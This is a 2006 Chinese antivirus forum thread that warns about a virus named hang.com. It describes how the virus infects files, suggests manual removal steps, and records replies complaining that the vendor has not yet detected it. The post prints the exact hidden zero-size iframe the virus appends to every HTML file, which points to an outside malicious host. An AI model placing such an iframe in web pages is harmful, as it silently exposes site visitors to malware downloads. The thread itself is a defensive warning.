瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 【警告】危险度极高 发现hang.com新病毒(内详解)

1   1  /  1  页   跳转

【警告】危险度极高 发现hang.com新病毒(内详解)

【警告】危险度极高 发现hang.com新病毒(内详解)

一旦被hang.com文件感染后
客户端 所有硬盘 注意是所有htm html文件
都会在末段 添加如下代码:
<iframe src="http://qq.ee28.cn/htm/" width="0" height="0" frameborder="0"></iframe>

即使杀毒后 如果启动带有 html的相关软件 就会染毒
例如:下载软件->网页链接->右键"使用XX软件下载"->会调用 geturlall.htm文件->染毒
===========================================
感染后 hang.com还会自动下载其它病毒 目前发现是捆绑了 橙色8月 和 一个征途木马
系统服务 会增加 network logon

================================
清除办法 目前只能手动 删除hang.com
下载橙色8月专杀
征途木马 手动清除 请自行搜索

不要再使用htm html文件 等待专杀出现
================

最后编辑2006-11-07 23:15:44
分享到:
gototop
 

顶起让更多人小心
gototop
 

哎 现在瑞星还是没反应 更新后 还是无法杀
暂时 添加到 HOSTS黑名单 防毒
gototop
 

又更新了 RS 不知道 能杀不
gototop
 

RS还是杀不了 真不知道工程师在干吗
已经 样本已经发5天了
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT